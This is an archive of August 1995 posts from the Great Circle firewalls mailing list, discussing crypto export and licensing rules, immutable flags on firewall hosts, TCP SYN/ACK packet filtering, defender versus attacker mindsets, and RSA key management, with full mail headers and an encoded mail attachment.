;). > You can't import crypto hard/soft to Russia without permission from Ministry of External Trade (which as I understand turns it to FAPSI). You also can't use crypto hard/soft without FAPSI's permission to communicate over public networks here. Refer to Yeltsin's Decree of April, 6, 1995. -- Igor V. Semenyuk Internet: iga@sovam.com SOVAM Teleport Phone: +7 095 956 3008 Moscow, Russia From firewalls-owner Fri Aug 11 14:41:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA16668 for firewalls-outgoing; Fri, 11 Aug 1995 13:34:01 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA16618 for ; Fri, 11 Aug 1995 13:33:52 -0700 Received: from cseic.saic.com(139.121.32.135) by miles via smap (V1.3) id sma016606; Fri Aug 11 13:33:02 1995 Received: by cseic.saic.com (4.1/1.34) id AA22579; Fri, 11 Aug 95 16:30:28 EDT Date: Fri, 11 Aug 95 16:30:28 EDT From: steveg@cseic.saic.com (Stephen Harold Goldstein) Message-Id: <9508112030.AA22579@cseic.saic.com> To: mdr@vodka.sse.att.com Cc: mjr@iwi.com, firewalls@greatcircle.com In-Reply-To: <9508101726.AA26472@ig1.att.att.com> (mdr@vodka.sse.att.com) Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mdr@vodka.sse.att.com writes: >How do they administer the system in mulituser mode? Presumably adding >users and accounts and such would be disallowed. Also adding undesired >services such as a telnetd or packet grabber would be disallowed. > >Ok then, no maintenance while in multi-user mode. Ouch! I thought we were discussing the benefits of immutable flags for use in securing Firewall boxes. In that context, there are (or should be) no user accounts that might require administration in multi-user mode. Further, I see the requirement of going to single user mode before the configuration can be changed as a real plus. Stephen Goldstein steveg@cseic.saic.com My first computer: A 24K Atari 800, Rev. A ROMS, November 1980 Disclaimer: That's not what I said. From firewalls-owner Fri Aug 11 15:06:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA20660 for firewalls-outgoing; Fri, 11 Aug 1995 14:25:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA20609 for ; Fri, 11 Aug 1995 14:25:28 -0700 From: scott@disclosure.com Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma020558; Fri Aug 11 14:25:19 1995 Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA17749; Fri, 11 Aug 95 17:23:52 -0400 Date: Fri, 11 Aug 95 17:23:51 -0400 Message-Id: <9508112123.AA17749@uvs1.orl.mmc.com> To: padgett@tccslr.dnet.mmc.com Cc: "peter@ris1.nmti.com"@uvs1.dnet.mmc.com, "firewalls@greatcircle.com"@uvs1.dnet.mmc.com Subject: Re: To OS or 0 2 OS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 11 Aug 1995 padgett@tccslr.dnet.mmc.com wrote: > Peter rites: > > >The only thing any UNIX uses the BIOS for is to load itself into memory. The > >BIOS interface is *so* broken that no high performance operating system uses > >it for anything else. NT doesn't use the BIOS ... it has its own drivers. > >OS/2 will use the BIOS but prefers not to. > > Is not broken, it does what it was designed to do very well (well, a "100% > compatable" one will). The BIOS has two major limitations: > 1) slow access > 2) fixed "real" (segmented) addressing 3) Some of the BIOS calls are not re-entrant and cannot be interrupted during their execution. According to what I have been told (I am not a PC programmer by trade, but I have played one on TV! :-), it makes for some very "critical" critical regions. Slow access calls (video I/O was the example given to me) can wreak havoc with schedulers. scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Fri Aug 11 15:31:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA20747 for firewalls-outgoing; Fri, 11 Aug 1995 14:26:38 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA20678 for ; Fri, 11 Aug 1995 14:26:27 -0700 Received: from panix.com(198.7.0.2) by miles via smap (V1.3) id sma020664; Fri Aug 11 14:25:49 1995 Received: (from lawnyc@localhost) by panix.com (8.6.12/8.6.12+PanixU1.1) id RAA18961; Fri, 11 Aug 1995 17:23:23 -0400 Date: Fri, 11 Aug 1995 17:23:23 -0400 (EDT) From: "John A. Young" To: padgett@tccslr.dnet.mmc.com cc: firewalls-digest@GreatCircle.COM Subject: Encrypted data across national boundaries In-Reply-To: <199508111631.JAA01234@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 11 Aug 1995 padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) wrote: > 1) Contrary to popular belief I am an engineer, not a lawyer. > > 2) The issue is not a single one, but rather multiple. > a) crypto mechanism > i) export from point of origin > ii) in transit between country of origin and country of originator > iii) import to originator > iv) export from originator's site > v) in transit from originator's country to recipients country > vi) import to each recipient's site > > b) encrypted messages > i) within country of origin > ii) in transit over intervening areas > iii) within country of receipt > > c) legality of use > i) in country of origin > ii) in country of receipt > >I don't get paid for this you know 8*). Despite your protestations, Padgett, I'd say you are not only a lawyer (albeit perhaps lacking the formal training and bar admission), but a damned good one as well! You'd better be careful about statements such as the last quoted one, though -- they can be considered *most* unlawyerlike and even ethically dubious. One possible solution to the France/Russia problem which has been floating through my mind as I've followed this thread, is a reversion to old fashioned "code-books". The outgoing message would be translated by word or phrase substitution (perhaps manually or perhaps automated through grep or a word processor's "global replace" function). The translated message could then be sent as clear text and retranslated at the other end. I would want to consult local counsel in the receiving country (I am licensed neither in France nor in Russia), but I would not be surprised to learn that such a procedure would pass muster where a more sophisticated one, such as PGP, would not. I know that such code books were used by wire services such as Reuters as long ago as the 19th century, though primarily to save on per/word cabling costs rather than for security. This would certainly require more day-to-day work than PGP, though if one translated only the "wheat" of the message, leaving the chaff unchanged, it would probably not be all that cumbersome. Regards, John . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * Providing user-friendly assistance : LawNYC@panix.com to techies and others, from NYC and : John A. Young, J.D. (Yale 1964) around the world, in dealing with : P.O. Box 4695 the problems, opportunities and : New York, NY 10185-4695 plain conundrums encountered when : (212) 765-2170 interfacing with the arcane worlds : (718) 875-0337 of business, law and property. * : (718) 488-7562 (fax) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . From firewalls-owner Fri Aug 11 15:40:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA24897 for firewalls-outgoing; Fri, 11 Aug 1995 15:07:12 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA24849 for ; Fri, 11 Aug 1995 15:07:05 -0700 Received: from scifi.emi.net(204.181.45.10) by miles via smap (V1.3) id sma024838; Fri Aug 11 15:06:37 1995 Received: (from njs@localhost) by scifi.maid.com (8.6.11/8.6.9) id SAA13422; Fri, 11 Aug 1995 18:04:49 -0400 Date: Fri, 11 Aug 1995 18:04:41 -29900 From: Nick Simicich Subject: Re: TCP Header Flags To: Carsten Schafer cc: firewalls@GreatCircle.COM, Carsten Schafer In-Reply-To: <9508111225.aa03131@rosie.software.group.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 11 Aug 1995, Carsten Schafer wrote: > I have recently been getting lots of packets with the SYN bit set > and a combination of PUSH, URG and RST. Our packet filter seems > to throw away anything with a SYN bit set. I guess I'm wondering > which packets are considered connection requests by TCP when the packet > contains a SYN bit. Are packets containing the SYN flag and no others > considered connection requests? Most of the packets with the other flags > set seem to be in response to HTTP requests. The initial request for a TCP connection has the SYN bit set, but not the ACK bit. Every other TCP packet in a connection has the ACK bit set, including the response to the initial SYN, which also has the SYN bit set. So filtration for directional TCP connections usually looks for packets that have SYN but not ACK. Once sequence numbers are agreed on, SYN is no longer sent. RST, of course, says that either we got a packet for a connection we don't have a record of, or we don't have that socket at all (not 100% sure on the latter, offhand - for UDP this returns ICMP Socket Unreachable). This means that you can typically probe the topology of a net protected by a packet filtering router even if they have filtered ICMP echo and port unreachable messages to stop ping and traceroute as well as all incoming connections. By the way, this is quite likely attempts from the HTTPD at the other end to connect to your identd so that they can log userids in the http daemon logs. Are the SYNs consistently aimed at the identd (or perhaps finger) ports? Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com http://scifi.emi.net/njs.html -- Stop by and Light Up The World! From firewalls-owner Fri Aug 11 16:03:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA28115 for firewalls-outgoing; Fri, 11 Aug 1995 15:55:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA28071 for ; Fri, 11 Aug 1995 15:55:13 -0700 Received: from uunet.ca(142.77.1.254) by miles via smap (V1.3) id sma028058; Fri Aug 11 15:54:43 1995 Received: from fujitsu.ca ([142.77.30.2]) by mail.uunet.ca with SMTP id <207816-5>; Fri, 11 Aug 1995 17:08:37 -0400 Received: by fujitsu.ca (4.1/SMI-4.1) id AA06568; Fri, 11 Aug 95 17:06:37 EDT Received: from falcon.fsbc.ca(192.10.1.205) by fujitsu.fsbc.ca via smap (V1.3) id sma006566; Fri Aug 11 17:06:14 1995 Received: by falcon (4.1/SMI-4.1) id AA01336; Fri, 11 Aug 95 17:05:33 EDT From: adrian@fujitsu.ca (Adrian Chan) Message-Id: <9508112105.AA01336@falcon> Subject: tests for firewall To: firewalls@greatcircle.com Date: Fri, 11 Aug 1995 17:05:32 -0400 X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Content-Length: 138 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Can someone please point me to some tests for firewall? I am new in this area. Thank you in advance. Adrian adrian.chan@fujitsu.ca From firewalls-owner Fri Aug 11 17:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA00893 for firewalls-outgoing; Fri, 11 Aug 1995 16:50:12 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA00739 for ; Fri, 11 Aug 1995 16:49:51 -0700 Received: from freya.cs.umass.edu(128.119.40.195) by miles via smap (V1.3) id sma000714; Fri Aug 11 16:49:09 1995 Received: by cs.umass.edu (5.65/Ultrix3.0-C) id AA14019; Fri, 11 Aug 1995 19:48:01 -0400 Message-Id: <9508112348.AA14019@cs.umass.edu> Subject: Re: Encrypted data across national boundaries To: Firewalls@greatcircle.com Date: Fri, 11 Aug 1995 19:48:00 -0400 (EDT) Reply-To: firewalls@greatcircle.com (Firewalls Mailing List) In-Reply-To: <199508111932.MAA11911@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Aug 11, 95 12:32:45 pm From: futplex@pseudonym.com (Futplex) X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2835 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just picking a few nits, and offering a pointer or two... MAHAJAN_VIVEK@tandem.com writes: # If there is a need to send data # to about 50 countries (including places such as Russia/China) is there any # kind of encryption solution either hardware or software that can be used # across the board? The data will originate from London for Europe, from # Singapore and Australia for Asia, and from USA for North and South America. Ted Doty writes: > As I understand it, The People's Republic of China is now off the "bad guy" > list, so you can export crypto to it. Not sure what the banking standard > is there, but I'd be kind of surprised if they don't do DES. Note that > this still falls under ITAR, so you (probably) need something like RC4 (or > NSC's cipher NSC1) for non-banking use. Probably RC4 with keys not much larger than 40 bits (a la the "international" version of Netscape's SSL protocol). What are the key size options for NSC1 ? > There doesn't seem to be a single cipher that can be used everywhere (except > the short list: Libia, North Korea, etc), EXCEPT for banks. This is mostly > the ITAR, but other places (France for sure; rumors have it that Australia > also restricts crypto ... can anyone confirm ot deny this?) also have their > own restrictions on crypto use ("Damn it ... that's against the First > Amendment! It's downright un-american!" ;). I'm not sure what's on your short list, but Russia has required licensing of cryptography since April. (cf. http://www.eff.org/pub/Global/Russia/) Ross Anderson has recently written about some proposed restrictions in Australia (his article ended up in RISKS), but I haven't seen any indication that legislation/regulation has actually been enacted there (yet). He says some of the spymaster types from the European Union, U.S., Japan, Australia, and South Africa held a conference recently to discuss tripping up crypto. [...and in a later message...] > If US company's MIS called the french company's MIS and told them to download > PGP (say, from Finland), probably both MIS departments would get an all- > expenses vacation in the local prison. The US guys for violation of ITAR, > the french for practicing encryption without a license. IANAL, but I'm pretty sure the former assertion is not true. Telling someone outside North America that they can get ITAR-controlled cryptography at, say, ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP does not constitute export. (See ftp://ftp.csn.net/mpj/getpgp.asc for other sites and info.) I would be interested in pointers to evidence of denied crypto license requests by the French govt., but I think Brent would agree that they would not be relevant to firewalls. BTW, the full text of the ITAR is available at ftp://ftp.cygnus.com/pub/export/itar.in.full -Futplex From firewalls-owner Fri Aug 11 18:00:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA02929 for firewalls-outgoing; Fri, 11 Aug 1995 17:55:42 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA02913 for ; Fri, 11 Aug 1995 17:55:40 -0700 Received: from einstein.technet.sg(192.169.33.50) by miles via smap (V1.3) id sma002908; Fri Aug 11 17:55:01 1995 Received: (from roland@localhost) by einstein.technet.sg (8.6.11/8.6.9) id IAA11279; Sat, 12 Aug 1995 08:52:58 +0800 Date: Sat, 12 Aug 1995 08:52:57 +0800 (SST) From: Roland Yeo To: Tham Huei Hwan cc: firewalls@GreatCircle.COM Subject: Re: Internet In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Huei Hwan, if you are interested in security information, you can find a lot of it at the ftp site: coast.cs.purdue.edu Is your company considering implementing a firewall solution..? regards, roland ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Roland Yeo Delteq Systems Phone: 65-2720806 Fax: 65-2739159 On Fri, 11 Aug 1995, Tham Huei Hwan wrote: > Hi, > > I am new in this mailling list and also new in internet, any body can > inform me where can get the information from the internet or by e-mail ? > > > Thank You. > > E-mail: Tham.Huei.Hwan@bass.com.my > > > > > > > > > > > > > > > > From firewalls-owner Fri Aug 11 18:36:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA03750 for firewalls-outgoing; Fri, 11 Aug 1995 18:20:56 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA03722 for ; Fri, 11 Aug 1995 18:20:52 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma003714; Fri Aug 11 18:19:55 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA18333; Fri, 11 Aug 95 21:02:07 -0400 Date: Fri, 11 Aug 95 21:02:07 -0400 Message-Id: <9508120102.AA18333@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Re: aTTaCks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brent rites: >"Think like a cracker" is an interesting exercise, but it's just that: an >exercise. Agree completely. Protecting a system takes a very different mindset from breaking in (though it helps to know the common mechanisms) some differences are: Defender Attacker must know every node on net just needs to know a few must not interfere with use rarely cares must understand all activity just needs one Not to say the defender does not start out with an advantage since can just ask, attacker must test/social engineer. Now when I go through a system, the process is really very boring - must identify every net, every subnet, every node/router/bride/gatorbox since any paper census is *always* wrong. Add in the fact that I need to pay as much attention to IPX as IP and Apppleshare/DECNet/Vines as well & things get tedious - fortunately they can be automated. Once this is done I check every node - here I have another advantage over most attackers: 10 ms RTT instead of 1000. Is practical to try all popular ports, not just NFS or RPC, and have been surprised a few times (like the admin who liked to put an "interesting" banner on a high four digits port on the Ciscos). But the fact is that while it is nice to be able to crack in in seconds sometimes, just to convince people that they really are not as secure as they thought, it is really the booooring stuff that provides protection. Warmly, Padgett From firewalls-owner Fri Aug 11 18:51:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA03044 for firewalls-outgoing; Fri, 11 Aug 1995 18:01:43 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA03028 for ; Fri, 11 Aug 1995 18:01:39 -0700 Received: from cid.infosel.com.mx(148.246.254.211) by miles via smap (V1.3) id sma003012; Fri Aug 11 18:00:52 1995 Received: from cidexchange (cidexchange.infosel.com.mx) by cid.infosel.com.mx (4.1/4.7) id AA29497; Fri, 11 Aug 95 18:52:36 CST Received: by cidexchange with Microsoft Mail id <01BA681C.B9672E70@cidexchange>; Fri, 11 Aug 1995 19:00:28 -0000 Message-Id: From: Jaime Alberto Botello Cantu To: "firewalls@greatcircle.com" , "'kurz@pc08.muc.telenet.de'" Subject: RE: Which firewall has best management? Date: Fri, 11 Aug 1995 16:14:03 -0000 Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BA681C.B97670B0" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------ =_NextPart_000_01BA681C.B97670B0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit I would like to know this too Thanks in advanced ---------- From: kurz@pc08.muc.telenet.de[SMTP:kurz@pc08.muc.telenet.de] Sent: viernes 11 de agosto de 1995 12:07 PM To: firewalls@greatcircle.com Subject: Which firewall has best management? Listening to the discussions for a while, I believe I've got a good impression of most technical features for standalone firewalls. But imagine the situation in a network consisting of more than one class B address. The network has connections to partner companies and other associated sites. Several routers are used to implement these. Different policies for the attached networks are defined. Is subdividing the net via firewalls a good idea? Which firewalls have the best management to accomplish this? A multipoint-of-access-and-control system would be good, where you can specify administrators and let them administrate different parts of the whole net. As performance might also be a problem, I tend towards an intelligent packet filtering firewall. Firewall-1 sounds good, because you can also manage the routers with that. An application gateway would still be useful for Internet access, maybe as an additional offer to the users. After slowly migrating all Internet use to the application gateway, one could apply stricter and stricter rules to the Internet router/packet filter. Any ideas? Michaela Kurz c/o Telenet GmbH Kommunikationssysteme Ungererstr. 75 80805 Munich Germany Voice: +49 89 36073-130 Fax: -125 E-Mail: mkurz@telenet.de ------ =_NextPart_000_01BA681C.B97670B0 Content-Type: application/ms-tnef Content-Transfer-Encoding: base64 eJ8+Ih0BAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEFgAMADgAAAMsHCAALABAA DgADAAUACwEBCYABACEAAAAxM0FFNzEwMDIzRDRDRTExQjhERDAwMDFGQTA0RjAxNwAFBwEggAMA DgAAAMsHCAALABMAAAAcAAUAGQEBCIAHABgAAABJUE0uTWljcm9zb2Z0IE1haWwuTm90ZQAxCAEE gAEAKAAAAFJFOiBXaGljaCBmaXJld2FsbCBoYXMgYmVzdCBtYW5hZ2VtZW50PwAADgENgAQAAgAA AAIAAgABA5AGAEwHAAASAAAACwAjAAAAAAALACkAAAAAAAMAJgAAAAAAAwA2AAAAAAAeAHAAAQAA ACQAAABXaGljaCBmaXJld2FsbCBoYXMgYmVzdCBtYW5hZ2VtZW50PwACAXEAAQAAABsAAAABumgQ 1m/KNHTx1AIRzrjdAAH6BPAXAAmJ9eQAAwAGEO9PAqADAAcQ4wQAAB4ACBABAAAAZQAAAElXT1VM RExJS0VUT0tOT1dUSElTVE9PVEhBTktTSU5BRFZBTkNFRC0tLS0tLS0tLS1GUk9NOktVUlpAUEMw OE1VQ1RFTEVORVRERVNNVFA6S1VSWkBQQzA4TVVDVEVMRU5FVEQAAAAAAwAQEAAAAAADABEQAAAA AAIBCRABAAAAmgUAAJYFAADvCgAATFpGdapqxfH/AAoBDwIVAqgF6wKDAFAC8gkCAGNoCsBzZXQy NwYABsMCgzIDxQIAcHJCcRHic3RlbQKDM+0RDDEPzwIANBRuBxMCg941A0UTNQdtAoM2A8YXmHY3 AuQXlX0KgAjPCdk7ER1PMTI4Hm9lMjWeNQKACoENsQtgbmcB0Fw1OAr7G5EL8mMSoCAISSB3CGBs ZCBsAGlrZSB0byBrZG5vB+B0aAQAJEFvywqFCoVUEYBuawQgC4DQIGFkdgBwYwmAJVwjCvQkADE4 MALRaS14MTQ0DfAM0CkzC1kxqxpgE1BvE9BjBUAtK1evCocqCwwwKtZGA2E6LF4PKtYMgiRwCHB6 QHBjgDA4Lm11Yy4T0BZsCfARwC4NsFtTTdhUUDowHzElXSv/LQ3vBmACMC4/L0t2CJExMAQgzjEV QA2wJsBnbxPAJGAhOFExOTk1OBAyOmAwNyBQTTOPLQ1UXm81zy9LKQAdUHcHQGxEc0AJwWF0Yz4A YzUxEC4FoG05/zSedWLuaisRPB8vS1ck4BFwPef2IBGABCBiB5AFQAOBOICbE+A1kT8nXyhjMzYp 1+8aYgwBKtZI+EwEABPQAwAvIaAkQiTQJDBkBABjdb0EEGkCIAQgAhAFwGEjkDsk4DEQLCNxRQAk AGV22SQwSSdMsTiQdAqFSPjvS7A4kARwJpBtE1AHkEsSeCBvZkVAOKEkQAWQaP0DAGMHQD3gPrEI cAeRS3LbE8AAcGQHQAIgZU1vPffmLiVcSPhCdQVAB3A4gP8LgCQxSoEAkFDgPsBPUiaixiAxMSOg cmsgBaAAgf8TwEoCT5MdUFRPJNADkVHxV1ewC2AEEUImwWRPEi7/JiEkMFdGRMJXwTEwKyBLI/ck UFjvCrF0MTAFwD9RCrB/AwAHkVGhT4BKcUuRBBBv/z7gPsAJgFZCB5BbcAZgTLD+cgdAXX8DYFVg BJBfgR1Q/iBK8GDBJFFO4TEQRbJKYnsRsFtwRAaQULAdUGSRcP8G8EPwX2JLcWHfSnI+wAGQvxFw YMFXRWNEDbFV0WRTz/VI9kkEIHNBkEqwN6BKsH9KElukN5FLsD33TmcNsGH+P0PEaj9s+BGATLFK ckUN7yRCANBfAiQAc0QQJNJuQHZBbr8wsGxWoGXQC4B0ei1PkC1yIU8hdSBRsC3tV8F0A2ADIHMT syOVRQDfToNMIEvQZXFzT3kIYFewWQORc3AFkAaQeSbBbf8LgEmxYaAkUGMyX7ExEGSj/3aweil4 D0qhZVdekQQgT5G/SnJL0AbwW7Npv0j2QQQgPXmwcktxA4EnIEVAaWf+aAVAB0BgYHciS7Aq0QJg /xPgTCJJ0WPSPjALIF+CgD/fdMExACQARZB+I2MkIAVAvykAdHAGcUoRPfZbcEY+Be8pIFFwCGBR sHOE33dkRQD/UHBjoXkXgpNFVEpjYuYD8N8k0Fnif6+AuCaxcHJxUHD9VqNnYKE+MHoAI6RYEUSR 23cxY6FmI8BLY0mF8TfR301fchJPIUwgAMB5guJfgv9a8lZgSyFQgU+QZWFKNmOhuxGgW3BBAYAE kJMPcxzg/HdsegCCMXqhSgJEgpKG/2OSSjaPqZefkGVMIFpDI7N/j6J6AHqBQ/BjEV+TnodyvyPA B5FKRJvvmfdi5C+Gq3+N7474egBuAnMAo59I9U1tQ/FhMQBLsEsyAaYvY0ovJGBUMQQgRwbQSO+n sANwMLADAGtWkwQQE7P5oJ8gVSGgZXERoHYQW3C8NzWrfyjAKMA5UE2qYVtun0jwRwSQA4F5rz9W x3SwJyBB8Cs0Oa5gslBpR2E3MykgMwp2SPhGfGF4QfC0jCkgINCzP0XULU0LcGxB8G0x8zD4/0Z/ KdcYMQvwFoAjQABQLVgLCoUccQC74AAAQAA5ACDIb8Q3aLoBAgFHAAEAAAAyAAAAYz1VUzthPSA7 cD1JbmZvU2VsO2w9UHJpdmF0ZSBNREItOTUwODExMjIxNDAzWi0yNQAAAEAABzCAQWvEN2i6AUAA CDCwlxgET2i6AR4APQABAAAABQAAAFJFOiAAAAAAAgEUNAEAAAAQAAAAVJShwCl/EBulhwgAKyol F3Fj ------ =_NextPart_000_01BA681C.B97670B0-- From firewalls-owner Fri Aug 11 19:30:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA05542 for firewalls-outgoing; Fri, 11 Aug 1995 19:04:14 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA05519 for ; Fri, 11 Aug 1995 19:04:11 -0700 Received: from mail2.digital.com(204.123.2.56) by miles via smap (V1.3) id sma005514; Fri Aug 11 19:03:22 1995 Received: from us3rmc.pa.dec.com by mail2.digital.com; (5.65 EXP 4/12/95 for V3.2/1.0/WV) id AA30622; Fri, 11 Aug 1995 18:57:22 -0700 Received: from hgovc.enet by us3rmc.pa.dec.com (5.65/rmc-22feb94) id AA16626; Fri, 11 Aug 95 18:57:11 -0700 Message-Id: <9508120157.AA16626@us3rmc.pa.dec.com> Received: from hgovc.enet; by us3rmc.enet; Fri, 11 Aug 95 18:57:12 PDT Date: Fri, 11 Aug 95 18:57:12 PDT From: Joel Berman 12-Aug-1995 0959 <"hgovc::joelberman"@hgovc.ENET.dec.com> To: us3rmc::"firewalls@greatcircle.com"@hgovc.ENET.dec.com Apparently-To: firewalls@greatcircle.com Subject: Auto Reply from Watch_Mail for 7-AUG-1995 23:15 to 14-SEP-1995 00:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I will be out of the office until Sept. 14, 1995. I will be reading mail after Sept 1, 1995. If your business concerns the ROyal Hong Kong Jockey CLub please contact Kelvin Yeung @ hgo. Otherwise I can be reached in an emergency through Wendy Chan @ hgo. Thanks and regards, Joel Berman From firewalls-owner Fri Aug 11 20:00:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA07107 for firewalls-outgoing; Fri, 11 Aug 1995 19:51:55 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA07076 for ; Fri, 11 Aug 1995 19:51:50 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma007068; Fri Aug 11 19:51:07 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA18541; Fri, 11 Aug 95 22:37:12 -0400 Date: Fri, 11 Aug 95 22:37:12 -0400 Message-Id: <9508120237.AA18541@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Re: Encrypted data across national boundaries Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Adam rites: > Whats wrong with using IDEA everywhere? Just don't buy your >crypto in the USA; import everything, including the expertise. (Using >DES everywhere also works; there are many firms that sell DES based >products outside the US. Is a common mythconception. Both IDEA and DES are symmetric ciphers, that is the same key is used for encryption and decryption. Both are believed to be strong, fast, and effective but the real problem is key management. This is the real power of the RSA private key/public key mechanism, it is assymetric. This means you can broadcast the public key and anyone can use to to encrypt, but only the person who has the matching private key can decrypt. Use in the forward direction, it provides strong crypto with easy key management. Used in reverse, it provides equally effective message authentication. This is the real power of RSA and why it deserved a patent, it was a real breakthrough in the major stumbling block to widespread crypto. Other mechanisms such as my own "unwitting key provider" are trivial in comparison. For a good in-depth analysis, see Bruce Scheier's "Applied Cryptography" and by the way, PGP only uses RSA for key exchange because it is sloooow, it uses IDEA for the actual crypto. Is also the reason I keep coming out in favor of Clipper: Not for the LEAF, still expect the gov to drop it. Not for SKIPJACK though I expect it is Good Enough (C). But for the auto-ignition capability. Warmly, Padgett ps oh, yeah, something about Firewalls: RSA does provide an easy way for firewalls to negotiate encrypted channels with sites they have not contacted before. From firewalls-owner Fri Aug 11 22:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA10955 for firewalls-outgoing; Fri, 11 Aug 1995 21:46:51 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA10947 for ; Fri, 11 Aug 1995 21:46:49 -0700 Received: from lobster.wellfleet.com(192.32.253.3) by miles via smap (V1.3) id sma010944; Fri Aug 11 21:46:44 1995 Received: from paperboy.wellfleet.com by lobster.wellfleet.com (4.1/SMI-4.1) id AA01777; Sat, 12 Aug 95 00:44:26 EDT Received: from BayNetworks.com by paperboy.wellfleet.com (4.1/SMI-4.1) id AA06971; Sat, 12 Aug 95 00:45:29 EDT From: Post_Office@BayNetworks.com (Post Office) Reply-To: Post_Office@BayNetworks.com To: Firewalls@GreatCircle.COM Subject: NDN: Firewalls-Digest V4 #479 Date: 12 Aug 1995 05:09:39 GMT Message-Id: <471728126.106432815@BayNetworks.com> Organization: Bay Networks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry. Your message could not be delivered to: David Hakaraia (Mailbox or Conference is full.) From firewalls-owner Fri Aug 11 22:22:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA10903 for firewalls-outgoing; Fri, 11 Aug 1995 21:39:51 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA10895 for ; Fri, 11 Aug 1995 21:39:49 -0700 Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma010890; Fri Aug 11 21:39:11 1995 Received: from vodka.sse.att.com by ig1.att.att.com id AA10704; Sat, 